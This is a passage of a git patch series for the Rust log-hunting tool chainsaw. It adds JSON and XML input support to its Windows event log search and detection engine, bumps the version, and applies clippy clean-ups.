100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -224,13 +224,18 @@ pub fn print_detections( )); seen.insert(0, rules); } else { - let wrapper = match &document.kind { - FileKind::Evtx => crate::evtx::Wrapper(&document.data), - FileKind::Unknown => continue, - }; // What we do here is hash each row since if the fields are the same but the values // are not then we would lose data, so in this case we split the row for hit in &grouping.hits { + let wrapper; + let mapped = match &document.kind { + FileKind::Evtx => { + wrapper = crate::evtx::Wrapper(&document.data); + hit.hunt.mapper.mapped(&wrapper) + } + FileKind::Json => hit.hunt.mapper.mapped(&document.data), + FileKind::Unknown => continue, + }; let fields: HashMap<_, _> = hit .hunt .mapper @@ -242,7 +247,6 @@ pub fn print_detections( let mut hasher = DefaultHasher::new(); for header in &headers { if let Some(field) = fields.get(header) { - let mapped = hit.hunt.mapper.mapped(&wrapper); if let Some(value) = mapped.find(&field.from) { match value.to_string() { Some(v) => { @@ -435,13 +439,19 @@ pub fn print_csv( rows.push((0, vec![json])); seen.insert(0, rules); } else { - let wrapper = match &document.kind { - FileKind::Evtx => crate::evtx::Wrapper(&document.data), - FileKind::Unknown => continue, - }; // What we do here is hash each row since if the fields are the same but the values // are not then we would lose data, so in this case we split the row for hit in &grouping.hits { + let wrapper; + let mapped = match &document.kind { + FileKind::Evtx => { + wrapper = crate::evtx::Wrapper(&document.data); + hit.hunt.mapper.mapped(&wrapper) + } + FileKind::Json => hit.hunt.mapper.mapped(&document.data), + FileKind::Unknown => continue, + }; + let fields: HashMap<_, _> = hit .hunt .mapper @@ -453,7 +463,6 @@ pub fn print_csv( let mut hasher = DefaultHasher::new(); for header in &headers { if let Some(field) = fields.get(header) { - let mapped = hit.hunt.mapper.mapped(&wrapper); if let Some(value) = mapped.find(&field.from) { match value.to_string() { Some(v) => { diff --git a/src/file/json.rs b/src/file/json.rs new file mode 100644 index 00000000..1c3958dc --- /dev/null +++ b/src/file/json.rs @@ -0,0 +1,46 @@ +use std::fs::File; +use std::io::BufReader; +use std::path::Path; + +use anyhow::Error; +use regex::RegexSet; +pub use serde_json::Value as Json; + +use crate::search::Searchable; + +pub struct Parser { + pub inner: Option, +} + +impl Parser { + pub fn load(path: &Path) -> crate::Result { + let file = File::open(path)?; + let reader = BufReader::new(file); + let json = serde_json::from_reader(reader)?; + Ok(Self { inner: Some(json) }) + } + + pub fn parse(&mut self) -> impl Iterator> + '_ { + if let Some(json) = self.inner.take() { + return match json { + Json::Array(array) => array + .into_iter() + .map(|x| Ok(x)) + .collect::>() + .into_iter(), + _ => vec![json] + .into_iter() + .map(|x| Ok(x)) + .collect::>() + .into_iter(), + }; + } + vec![].into_iter() + } +} + +impl Searchable for Json { + fn matches(&self, regex: &RegexSet) -> bool { + regex.is_match(&self.to_string()) + } +} diff --git a/src/file/mod.rs b/src/file/mod.rs index 7096ef36..03f27fca 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -4,12 +4,15 @@ use std::path::{Path, PathBuf}; use serde::{Deserialize, Serialize}; use self::evtx::{Evtx, Parser as EvtxParser}; +use self::json::{Json, Parser as JsonParser}; pub mod evtx; +pub mod json; #[derive(Clone)] pub enum Document { Evtx(Evtx), + Json(Json), } pub struct Documents<'a> { @@ -20,6 +23,7 @@ pub struct Documents<'a> { #[serde(rename_all = "snake_case")] pub enum Kind { Evtx, + Json, Unknown, } @@ -42,6 +46,7 @@ impl Iterator for Unknown { pub enum Parser { Evtx(EvtxParser), + Json(JsonParser), Unknown, } @@ -58,6 +63,9 @@ impl Reader { "evtx" => Ok(Self { parser: Parser::Evtx(EvtxParser::load(file)?), }), + "json" => Ok(Self { + parser: Parser::Json(JsonParser::load(file)?), + }), _ => { if load_unknown { if skip_errors { @@ -81,6 +89,10 @@ impl Reader { return Ok(Self { parser: Parser::Evtx(parser), }); + } else if let Ok(parser) = JsonParser::load(file) { + return Ok(Self { + parser: Parser::Json(parser), + }); } if skip_errors { cs_eyellowln!("file type is not known"); @@ -106,7 +118,10 @@ impl Reader { parser .parse() .map(|r| r.map(|d| Document::Evtx(d)).map_err(|e| e.into())), - ), + ) + as Box> + 'a>, + Parser::Json(parser) => Box::new(parser.parse().map(|r| r.map(|d| Document::Json(d)))) + as Box> + 'a>, Parser::Unknown => { Box::new(Unknown) as Box> + 'a> } @@ -117,6 +132,7 @@ impl Reader { pub fn kind(&self) -> Kind { match self.parser { Parser::Evtx(_) => Kind::Evtx, + Parser::Json(_) => Kind::Json, Parser::Unknown => Kind::Unknown, } } diff --git a/src/hunt.rs b/src/hunt.rs index 7e9c880d..91418181 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -374,7 +374,7 @@ impl Hunter { HunterBuilder::new() } - pub fn hunt(&self, file: &Path) -> crate::Result> { + pub fn hunt<'a>(&self, file: &Path) -> crate::Result> { let mut reader = Reader::load(file, self.inner.load_unknown, self.inner.skip_errors)?; let kind = reader.kind(); // This can be optimised better ;) @@ -392,16 +392,20 @@ impl Hunter { return Err(e); } }; - let wrapper = match &document { - File::Evtx(evtx) => crate::evtx::Wrapper(&evtx.data), - }; let mut hits = vec![]; for hunt in &self.inner.hunts { if hunt.file != kind { continue; } - let mapped = hunt.mapper.mapped(&wrapper); + let wrapper; + let mapped = match &document { + File::Evtx(evtx) => { + wrapper = crate::evtx::Wrapper(&evtx.data); + hunt.mapper.mapped(&wrapper) + } + File::Json(json) => hunt.mapper.mapped(json), + }; let timestamp = match mapped.find(&hunt.timestamp) { Some(value) => match value.as_str() { @@ -501,6 +505,7 @@ impl Hunter { if !hits.is_empty() { let data = match &document { File::Evtx(evtx) => evtx.data.clone(), + File::Json(json) => json.clone(), }; detections.push(Detections { hits, @@ -530,6 +535,7 @@ impl Hunter { let (document, timestamp) = files.get(&id).expect("could not get document"); let data = match &document { File::Evtx(evtx) => evtx.data.clone(), + File::Json(json) => json.clone(), }; documents.push(Document { kind: kind.clone(), diff --git a/src/search.rs b/src/search.rs index 19a016f6..66a2f6fc 100644 --- a/src/search.rs +++ b/src/search.rs @@ -54,38 +54,37 @@ impl<'a> Iterator for Iter<'a> { .as_ref() .expect("could not get timestamp"); // TODO: Default to RFC 3339 - let timestamp = match &document { + let result = match &document { Document::Evtx(evtx) => match crate::evtx::Wrapper(&evtx.data).find(&field) { Some(value) => match value.as_str() { Some(timestamp) => { - match NaiveDateTime::parse_from_str( - timestamp, - "%Y-%m-%dT%H:%M:%S%.6fZ", - ) { - Ok(t) => t, - Err(e) => { - if self.searcher.skip_errors { - cs_eyellowln!( - "failed to parse timestamp '{}' - {}", - timestamp, - e, - ); - continue; - } else { - return Some(Err(anyhow::anyhow!( - "failed to parse timestamp '{}' - {}", - timestamp, - e - ))); - } - } - } + NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") + } + None => continue, + }, + None => continue, + }, + Document::Json(json) => match json.find(&field) { + Some(value) => match value.as_str() { + Some(timestamp) => { + NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") } None => continue, }, None => continue, }, }; + let timestamp = match result { + Ok(t) => t, + Err(e) => { + if self.searcher.skip_errors { + cs_eyellowln!("failed to parse timestamp - {}", e); + continue; + } else { + return Some(Err(anyhow::anyhow!("failed to parse timestamp - {}", e))); + } + } + }; // TODO: Not sure if this is correct... let localised = if let Some(timezone) = self.searcher.timezone { let local = match timezone.from_local_datetime(×tamp).single() { @@ -128,20 +127,36 @@ impl<'a> Iterator for Iter<'a> { } } } - let r = match document { - Document::Evtx(evtx) => evtx, - }; - if let Some(expression) = &self.searcher.tau { - if !tau_engine::core::solve(&expression, &crate::evtx::Wrapper(&r.data)) { - continue; + // TODO: Remove duplication... + match document { + Document::Evtx(evtx) => { + let wrapper = crate::evtx::Wrapper(&evtx.data); + if let Some(expression) = &self.searcher.tau { + if !tau_engine::core::solve(&expression, &wrapper) { + continue; + } + if self.searcher.regex.len() == 0 { + return Some(Ok(evtx.data)); + } + } + if evtx.matches(&self.searcher.regex) { + return Some(Ok(evtx.data)); + } } - if self.searcher.regex.len() == 0 { - return Some(Ok(r.data)); + Document::Json(json) => { + if let Some(expression) = &self.searcher.tau { + if !tau_engine::core::solve(&expression, &json) { + continue; + } + if self.searcher.regex.len() == 0 { + return Some(Ok(json)); + } + } + if json.matches(&self.searcher.regex) { + return Some(Ok(json)); + } } - } - if r.matches(&self.searcher.regex) { - return Some(Ok(r.data)); - } + }; } None } From 7f976a3e056366cbea539cc01e9ec0e2c0e102e4 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 14:25:10 +0100 Subject: [PATCH 13/77] feat: add basic xml file support --- Cargo.lock | 13 ++++++++++++- Cargo.toml | 1 + src/cli.rs | 8 ++++++-- src/file/mod.rs | 15 +++++++++++++++ src/file/xml.rs | 42 ++++++++++++++++++++++++++++++++++++++++++ src/hunt.rs | 3 +++ src/search.rs | 4 ++-- 7 files changed, 81 insertions(+), 5 deletions(-) create mode 100644 src/file/xml.rs diff --git a/Cargo.lock b/Cargo.lock index 7bc20f9b..e349abe1 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -168,6 +168,7 @@ dependencies = [ "once_cell", "paste", "prettytable-rs", + "quick-xml 0.23.0", "rayon", "regex 1.5.6", "serde", @@ -499,7 +500,7 @@ dependencies = [ "encoding", "indoc", "log", - "quick-xml", + "quick-xml 0.22.0", "rayon", "serde", "serde_json", @@ -882,6 +883,16 @@ dependencies = [ "memchr", ] +[[package]] +name = "quick-xml" +version = "0.23.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9279fbdacaad3baf559d8cabe0acc3d06e30ea14931af31af79578ac0946decc" +dependencies = [ + "memchr", + "serde", +] + [[package]] name = "quote" version = "1.0.18" diff --git a/Cargo.toml b/Cargo.toml index e0805f78..e5bea585 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -19,6 +19,7 @@ evtx = "0.7" indicatif = "0.16" once_cell = "1.0" prettytable-rs = "0.8" +quick-xml = { version = "0.23", features = ["serialize"] } rayon = "1.5" regex = "1.5" serde = { version = "1.0", features = ["derive"] } diff --git a/src/cli.rs b/src/cli.rs index e8178ea2..fdf35bbd 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -233,7 +233,9 @@ pub fn print_detections( wrapper = crate::evtx::Wrapper(&document.data); hit.hunt.mapper.mapped(&wrapper) } - FileKind::Json => hit.hunt.mapper.mapped(&document.data), + FileKind::Json | FileKind::Xml => { + hit.hunt.mapper.mapped(&document.data) + } FileKind::Unknown => continue, }; let fields: HashMap<_, _> = hit @@ -448,7 +450,9 @@ pub fn print_csv( wrapper = crate::evtx::Wrapper(&document.data); hit.hunt.mapper.mapped(&wrapper) } - FileKind::Json => hit.hunt.mapper.mapped(&document.data), + FileKind::Json | FileKind::Xml => { + hit.hunt.mapper.mapped(&document.data) + } FileKind::Unknown => continue, }; diff --git a/src/file/mod.rs b/src/file/mod.rs index 03f27fca..1d75452d 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -5,14 +5,17 @@ use serde::{Deserialize, Serialize}; use self::evtx::{Evtx, Parser as EvtxParser}; use self::json::{Json, Parser as JsonParser}; +use self::xml::{Parser as XmlParser, Xml}; pub mod evtx; pub mod json; +pub mod xml; #[derive(Clone)] pub enum Document { Evtx(Evtx), Json(Json), + Xml(Xml), } pub struct Documents<'a> { @@ -24,6 +27,7 @@ pub struct Documents<'a> { pub enum Kind { Evtx, Json, + Xml, Unknown, } @@ -47,6 +51,7 @@ impl Iterator for Unknown { pub enum Parser { Evtx(EvtxParser), Json(JsonParser), + Xml(XmlParser), Unknown, } @@ -66,6 +71,9 @@ impl Reader { "json" => Ok(Self { parser: Parser::Json(JsonParser::load(file)?), }), + "xml" => Ok(Self { + parser: Parser::Xml(XmlParser::load(file)?), + }), _ => { if load_unknown { if skip_errors { @@ -93,6 +101,10 @@ impl Reader { return Ok(Self { parser: Parser::Json(parser), }); + } else if let Ok(parser) = XmlParser::load(file) { + return Ok(Self { + parser: Parser::Xml(parser), + }); } if skip_errors { cs_eyellowln!("file type is not known"); @@ -122,6 +134,8 @@ impl Reader { as Box> + 'a>, Parser::Json(parser) => Box::new(parser.parse().map(|r| r.map(|d| Document::Json(d)))) as Box> + 'a>, + Parser::Xml(parser) => Box::new(parser.parse().map(|r| r.map(|d| Document::Xml(d)))) + as Box> + 'a>, Parser::Unknown => { Box::new(Unknown) as Box> + 'a> } @@ -133,6 +147,7 @@ impl Reader { match self.parser { Parser::Evtx(_) => Kind::Evtx, Parser::Json(_) => Kind::Json, + Parser::Xml(_) => Kind::Xml, Parser::Unknown => Kind::Unknown, } } diff --git a/src/file/xml.rs b/src/file/xml.rs new file mode 100644 index 00000000..00913eb9 --- /dev/null +++ b/src/file/xml.rs @@ -0,0 +1,42 @@ +use std::fs::File; +use std::io::BufReader; +use std::path::Path; + +use anyhow::Error; +use serde_json::Value as Json; + +// NOTE: Because we just deserialize into JSON, this looks pretty much the same as the JSON +// implementation. Maybe in time we will parse it differently... + +pub type Xml = Json; + +pub struct Parser { + pub inner: Option, +} + +impl Parser { + pub fn load(path: &Path) -> crate::Result { + let file = File::open(path)?; + let reader = BufReader::new(file); + let xml = quick_xml::de::from_reader(reader)?; + Ok(Self { inner: Some(xml) }) + } + + pub fn parse(&mut self) -> impl Iterator> + '_ { + if let Some(json) = self.inner.take() { + return match json { + Json::Array(array) => array + .into_iter() + .map(|x| Ok(x)) + .collect::>() + .into_iter(), + _ => vec![json] + .into_iter() + .map(|x| Ok(x)) + .collect::>() + .into_iter(), + }; + } + vec![].into_iter() + } +} diff --git a/src/hunt.rs b/src/hunt.rs index 91418181..703a735d 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -405,6 +405,7 @@ impl Hunter { hunt.mapper.mapped(&wrapper) } File::Json(json) => hunt.mapper.mapped(json), + File::Xml(xml) => hunt.mapper.mapped(xml), }; let timestamp = match mapped.find(&hunt.timestamp) { @@ -506,6 +507,7 @@ impl Hunter { let data = match &document { File::Evtx(evtx) => evtx.data.clone(), File::Json(json) => json.clone(), + File::Xml(xml) => xml.clone(), }; detections.push(Detections { hits, @@ -536,6 +538,7 @@ impl Hunter { let data = match &document { File::Evtx(evtx) => evtx.data.clone(), File::Json(json) => json.clone(), + File::Xml(xml) => xml.clone(), }; documents.push(Document { kind: kind.clone(), diff --git a/src/search.rs b/src/search.rs index 66a2f6fc..34026405 100644 --- a/src/search.rs +++ b/src/search.rs @@ -64,7 +64,7 @@ impl<'a> Iterator for Iter<'a> { }, None => continue, }, - Document::Json(json) => match json.find(&field) { + Document::Json(json) | Document::Xml(json) => match json.find(&field) { Some(value) => match value.as_str() { Some(timestamp) => { NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") @@ -143,7 +143,7 @@ impl<'a> Iterator for Iter<'a> { return Some(Ok(evtx.data)); } } - Document::Json(json) => { + Document::Json(json) | Document::Xml(json) => { if let Some(expression) = &self.searcher.tau { if !tau_engine::core::solve(&expression, &json) { continue; From 8192a542afce4cac2d55a314fd829c2ab7e8c54f Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 14:25:55 +0100 Subject: [PATCH 14/77] build: bump to v2.0.0-alpha.3 --- Cargo.lock | 2 +- Cargo.toml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index e349abe1..367822c9 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -156,7 +156,7 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = "2.0.0-alpha.2" +version = "2.0.0-alpha.3" dependencies = [ "aho-corasick 0.7.18", "anyhow", diff --git a/Cargo.toml b/Cargo.toml index e5bea585..83623c75 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "chainsaw" -version = "2.0.0-alpha.2" +version = "2.0.0-alpha.3" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" authors = ["James Dorgan ","Alex Kornitzer "] From 58a29bf6e309fa4c0d7426f4392d30a2e9be3a3c Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 15:38:43 +0100 Subject: [PATCH 15/77] refactor: apply clippy suggestions --- src/cli.rs | 23 +++++----- src/file/evtx.rs | 2 +- src/file/json.rs | 8 +--- src/file/mod.rs | 22 +++++---- src/file/xml.rs | 8 +--- src/hunt.rs | 103 ++++++++++++++++++++----------------------- src/main.rs | 2 +- src/rule/chainsaw.rs | 4 +- src/rule/mod.rs | 16 +++---- src/search.rs | 16 +++---- 10 files changed, 94 insertions(+), 110 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index fdf35bbd..0c678510 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -54,9 +54,9 @@ pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String // Take the context_field and format it for printing. Remove newlines, break into even chunks etc. // If this is a scheduled task we need to parse the XML to make it more readable let mut data = data - .replace("\n", "") - .replace("\r", "") - .replace("\t", "") + .replace('\n', "") + .replace('\r', "") + .replace('\t', "") .replace(" ", " ") .chars() .collect::>() @@ -163,7 +163,7 @@ pub fn print_detections( keys.sort(); for key in keys { let mut group = groups.remove(&key).expect("could not get grouping!"); - group.sort_by(|x, y| x.timestamp.cmp(&y.timestamp)); + group.sort_by(|x, y| x.timestamp.cmp(y.timestamp)); let mut table = Table::new(); table.set_format(format); @@ -195,7 +195,7 @@ pub fn print_detections( .expect("failed to localise timestamp") .to_rfc3339() } else { - DateTime::::from_utc(grouping.timestamp.clone(), Utc).to_rfc3339() + DateTime::::from_utc(*grouping.timestamp, Utc).to_rfc3339() }; // NOTE: Currently we don't do any fancy outputting for aggregates so we can cut some @@ -383,10 +383,10 @@ pub fn print_csv( keys.sort(); for key in keys { let mut group = groups.remove(&key).expect("could not get grouping!"); - group.sort_by(|x, y| x.timestamp.cmp(&y.timestamp)); + group.sort_by(|x, y| x.timestamp.cmp(y.timestamp)); // FIXME: Handle name clashes - let filename = format!("{}.csv", key.replace(" ", "_").to_lowercase()); + let filename = format!("{}.csv", key.replace(' ', "_").to_lowercase()); let path = directory.join(&filename); let mut csv = prettytable::csv::Writer::from_path(path)?; cs_eprintln!("[+] Created {}", filename); @@ -415,7 +415,7 @@ pub fn print_csv( .expect("failed to localise timestamp") .to_rfc3339() } else { - DateTime::::from_utc(grouping.timestamp.clone(), Utc).to_rfc3339() + DateTime::::from_utc(*grouping.timestamp, Utc).to_rfc3339() }; // NOTE: Currently we don't do any fancy outputting for aggregates so we can cut some @@ -501,7 +501,7 @@ pub fn print_csv( cells.push( rules .iter() - .map(|rule| format!("{}", rule.name)) + .map(|rule| rule.name.to_string()) .collect::>() .join(";"), ); @@ -542,7 +542,7 @@ pub fn print_json( } let mut detections = detections .iter() - .map(|d| { + .flat_map(|d| { let mut detections = Vec::with_capacity(d.hits.len()); for hit in &d.hits { let (kind, rule) = rs.get(&hit.rule).expect("could not get rule!"); @@ -558,7 +558,7 @@ pub fn print_json( .expect("failed to localise timestamp") .to_rfc3339() } else { - DateTime::::from_utc(hit.timestamp.clone(), Utc).to_rfc3339() + DateTime::::from_utc(hit.timestamp, Utc).to_rfc3339() }; detections.push(Detection { authors: &rule.authors, @@ -573,7 +573,6 @@ pub fn print_json( } detections }) - .flatten() .collect::>(); detections.sort_by(|x, y| x.timestamp.cmp(&y.timestamp)); cs_print_json!(&detections)?; diff --git a/src/file/evtx.rs b/src/file/evtx.rs index 9e6b88dd..9f2beba1 100644 --- a/src/file/evtx.rs +++ b/src/file/evtx.rs @@ -41,7 +41,7 @@ impl<'a> Document for Wrapper<'a> { // will be ignored... self.0 .find("Event.System.EventID.#text") - .or(self.0.find(key)) + .or_else(|| self.0.find(key)) } "Event.System.Provider" => self.0.find("Event.System.Provider_attributes.Name"), "Event.System.TimeCreated" => self diff --git a/src/file/json.rs b/src/file/json.rs index 1c3958dc..7114a04d 100644 --- a/src/file/json.rs +++ b/src/file/json.rs @@ -23,14 +23,10 @@ impl Parser { pub fn parse(&mut self) -> impl Iterator> + '_ { if let Some(json) = self.inner.take() { return match json { - Json::Array(array) => array - .into_iter() - .map(|x| Ok(x)) - .collect::>() - .into_iter(), + Json::Array(array) => array.into_iter().map(Ok).collect::>().into_iter(), _ => vec![json] .into_iter() - .map(|x| Ok(x)) + .map(Ok) .collect::>() .into_iter(), }; diff --git a/src/file/mod.rs b/src/file/mod.rs index 1d75452d..08dee20b 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -129,12 +129,12 @@ impl Reader { Parser::Evtx(parser) => Box::new( parser .parse() - .map(|r| r.map(|d| Document::Evtx(d)).map_err(|e| e.into())), + .map(|r| r.map(Document::Evtx).map_err(|e| e.into())), ) as Box> + 'a>, - Parser::Json(parser) => Box::new(parser.parse().map(|r| r.map(|d| Document::Json(d)))) + Parser::Json(parser) => Box::new(parser.parse().map(|r| r.map(Document::Json))) as Box> + 'a>, - Parser::Xml(parser) => Box::new(parser.parse().map(|r| r.map(|d| Document::Xml(d)))) + Parser::Xml(parser) => Box::new(parser.parse().map(|r| r.map(Document::Xml))) as Box> + 'a>, Parser::Unknown => { Box::new(Unknown) as Box> + 'a> @@ -195,18 +195,16 @@ pub fn get_files( } } }; - files.extend(get_files(&dir.path(), &extension, skip_errors)?); + files.extend(get_files(&dir.path(), extension, skip_errors)?); } - } else { - if let Some(extension) = extension { - if let Some(ext) = path.extension() { - if ext == extension.as_str() { - files.push(path.to_path_buf()); - } + } else if let Some(extension) = extension { + if let Some(ext) = path.extension() { + if ext == extension.as_str() { + files.push(path.to_path_buf()); } - } else { - files.push(path.to_path_buf()); } + } else { + files.push(path.to_path_buf()); } } else { anyhow::bail!("Invalid input path: {}", path.display()); diff --git a/src/file/xml.rs b/src/file/xml.rs index 00913eb9..6bfca0bf 100644 --- a/src/file/xml.rs +++ b/src/file/xml.rs @@ -25,14 +25,10 @@ impl Parser { pub fn parse(&mut self) -> impl Iterator> + '_ { if let Some(json) = self.inner.take() { return match json { - Json::Array(array) => array - .into_iter() - .map(|x| Ok(x)) - .collect::>() - .into_iter(), + Json::Array(array) => array.into_iter().map(Ok).collect::>().into_iter(), _ => vec![json] .into_iter() - .map(|x| Ok(x)) + .map(Ok) .collect::>() .into_iter(), }; diff --git a/src/hunt.rs b/src/hunt.rs index 703a735d..ab28ae03 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -94,10 +94,10 @@ impl HunterBuilder { for rule in rules { let uuid = Uuid::new_v4(); let rules = map.entry(rule.kind.clone()).or_insert(vec![]); - if &rule.kind == &RuleKind::Chainsaw { + if rule.kind == RuleKind::Chainsaw { let mapper = Mapper::from(rule.chainsaw.fields.clone()); hunts.push(Hunt { - id: uuid.clone(), + id: uuid, group: rule.chainsaw.group.clone(), kind: HuntKind::Rule { @@ -123,7 +123,7 @@ impl HunterBuilder { let mut file = fs::File::open(mapping)?; let mut content = String::new(); file.read_to_string(&mut content)?; - let mut mapping: Mapping = serde_yaml::from_str(&mut content)?; + let mut mapping: Mapping = serde_yaml::from_str(&content)?; mapping.groups.sort_by(|x, y| x.name.cmp(&y.name)); for group in mapping.groups { let mapper = Mapper::from(group.fields); @@ -291,43 +291,38 @@ impl<'a> TauDocument for Mapped<'a> { None => self.document.find(key), }, MapperKind::Full(map) => match map.get(key) { - Some((v, c)) => match c { - Some(container) => { - if let Some(cache) = self.cache.get() { - return cache.get(&container.field).and_then(|hit| hit.find(v)); - } - // Due to referencing and ownership, we parse all containers at once, which - // then allows us to use a OnceCell. - let mut lookup = HashMap::new(); - for field in &self.mapper.fields { - if let Some(container) = &field.container { - if !lookup.contains_key(&container.field) { - let data = match self.document.find(&container.field) { - Some(Tau::String(s)) => match container.format { - Format::Json => { - match serde_json::from_str::(&s) { - Ok(j) => Box::new(j) as Box, - Err(_) => continue, - } - } + Some((v, Some(container))) => { + if let Some(cache) = self.cache.get() { + return cache.get(&container.field).and_then(|hit| hit.find(v)); + } + // Due to referencing and ownership, we parse all containers at once, which + // then allows us to use a OnceCell. + let mut lookup = HashMap::new(); + for field in &self.mapper.fields { + if let Some(container) = &field.container { + if !lookup.contains_key(&container.field) { + let data = match self.document.find(&container.field) { + Some(Tau::String(s)) => match container.format { + Format::Json => match serde_json::from_str::(&s) { + Ok(j) => Box::new(j) as Box, + Err(_) => continue, }, - _ => continue, - }; - lookup.insert(container.field.clone(), data); - } + }, + _ => continue, + }; + lookup.insert(container.field.clone(), data); } } - if let Err(_) = self.cache.set(lookup) { - panic!("cache is already set!"); - } - if let Some(cache) = self.cache.get() { - return cache.get(&container.field).and_then(|hit| hit.find(v)); - } - None } - None => self.document.find(key), - }, - None => self.document.find(key), + if self.cache.set(lookup).is_err() { + panic!("cache is already set!"); + } + if let Some(cache) = self.cache.get() { + return cache.get(&container.field).and_then(|hit| hit.find(v)); + } + None + } + _ => self.document.find(key), }, } } @@ -374,7 +369,7 @@ impl Hunter { HunterBuilder::new() } - pub fn hunt<'a>(&self, file: &Path) -> crate::Result> { + pub fn hunt(&self, file: &Path) -> crate::Result> { let mut reader = Reader::load(file, self.inner.load_unknown, self.inner.skip_errors)?; let kind = reader.kind(); // This can be optimised better ;) @@ -444,23 +439,23 @@ impl Hunter { match &hunt.kind { HuntKind::Group { exclusions, filter } => { if let Some(rules) = self.inner.rules.get(&hunt.rule) { - if tau_engine::core::solve(&filter, &mapped) { + if tau_engine::core::solve(filter, &mapped) { for (rid, rule) in rules { if exclusions.contains(&rule.name) { continue; } let hit = match &rule.filter { Filter::Detection(detection) => { - tau_engine::solve(&detection, &mapped) + tau_engine::solve(detection, &mapped) } Filter::Expression(expression) => { - tau_engine::core::solve(&expression, &mapped) + tau_engine::core::solve(expression, &mapped) } }; if hit { hits.push(Hit { - hunt: hunt.id.clone(), - rule: rid.clone(), + hunt: hunt.id, + rule: *rid, timestamp, }); } @@ -470,18 +465,18 @@ impl Hunter { } HuntKind::Rule { aggregate, filter } => { let hit = match &filter { - Filter::Detection(detection) => tau_engine::solve(&detection, &mapped), + Filter::Detection(detection) => tau_engine::solve(detection, &mapped), Filter::Expression(expression) => { - tau_engine::core::solve(&expression, &mapped) + tau_engine::core::solve(expression, &mapped) } }; if hit { if let Some(aggregate) = aggregate { - files.insert(document_id.clone(), (document.clone(), timestamp)); + files.insert(document_id, (document.clone(), timestamp)); let mut hasher = DefaultHasher::new(); for field in &aggregate.fields { if let Some(value) = - mapped.find(&field).and_then(|s| s.to_string()) + mapped.find(field).and_then(|s| s.to_string()) { value.hash(&mut hasher); } @@ -489,13 +484,13 @@ impl Hunter { let id = hasher.finish(); let aggregates = aggregates .entry(hunt.id) - .or_insert((&aggregate, HashMap::new())); + .or_insert((aggregate, HashMap::new())); let docs = aggregates.1.entry(id).or_insert(vec![]); - docs.push(document_id.clone()); + docs.push(document_id); } else { hits.push(Hit { - hunt: hunt.id.clone(), - rule: hunt.id.clone(), + hunt: hunt.id, + rule: hunt.id, timestamp, }); } @@ -534,7 +529,7 @@ impl Hunter { let mut documents = Vec::with_capacity(ids.len()); let mut timestamps = Vec::with_capacity(ids.len()); for id in ids { - let (document, timestamp) = files.get(&id).expect("could not get document"); + let (document, timestamp) = files.get(id).expect("could not get document"); let data = match &document { File::Evtx(evtx) => evtx.data.clone(), File::Json(json) => json.clone(), @@ -544,13 +539,13 @@ impl Hunter { kind: kind.clone(), data, }); - timestamps.push(timestamp.clone()); + timestamps.push(*timestamp); } timestamps.sort(); detections.push(Detections { hits: vec![Hit { - hunt: id.clone(), - rule: id.clone(), + hunt: id, + rule: id, timestamp: timestamps .into_iter() .next() diff --git a/src/main.rs b/src/main.rs index 18fd7a96..56069d5a 100644 --- a/src/main.rs +++ b/src/main.rs @@ -421,7 +421,7 @@ fn run() -> Result<()> { } }; if json { - if !(hits == 0) { + if hits != 0 { cs_print!(","); } cs_print_json!(&hit)?; diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index a3adbf32..dd1725e6 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -102,7 +102,7 @@ impl<'de> Deserialize<'de> for Field { let name = name.unwrap_or_else(|| to.clone()); let from = from.unwrap_or_else(|| to.clone()); let container = container.unwrap_or_default(); - let visible = visible.unwrap_or_else(|| true); + let visible = visible.unwrap_or(true); Ok(Field { name, to, @@ -113,7 +113,7 @@ impl<'de> Deserialize<'de> for Field { } } - const FIELDS: &'static [&'static str] = &["container", "from", "name", "to", "visible"]; + const FIELDS: &[&str] = &["container", "from", "name", "to", "visible"]; deserializer.deserialize_struct("Field", FIELDS, FieldVisitor) } } diff --git a/src/rule/mod.rs b/src/rule/mod.rs index dce67157..2afbb2f8 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -1,4 +1,4 @@ -use std::path::PathBuf; +use std::path::Path; use std::str::FromStr; use serde::{Deserialize, Serialize}; @@ -47,19 +47,19 @@ pub struct Rule { pub kind: Kind, } -pub fn load_rule(path: &PathBuf) -> crate::Result> { +pub fn load_rule(path: &Path) -> crate::Result> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); } } // This is a bit crude but we try all formats then report the errors... - let rules = if let Ok(rule) = chainsaw::load(&path) { + let rules = if let Ok(rule) = chainsaw::load(path) { vec![Rule { chainsaw: rule, kind: Kind::Chainsaw, }] - } else if let Ok(rules) = sigma::load(&path) { + } else if let Ok(rules) = sigma::load(path) { rules .into_iter() .filter_map(|r| serde_yaml::from_value(r).ok()) @@ -99,7 +99,7 